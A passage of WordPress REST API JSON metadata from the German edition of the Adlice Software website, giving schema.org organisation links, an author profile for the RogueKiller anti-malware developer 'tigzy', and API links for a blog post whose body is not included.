Software"},"image":{"@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.","url":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/comments?post=179"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/179\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media\/181"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media?parent=179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/categories?post=179"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/tags?post=179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}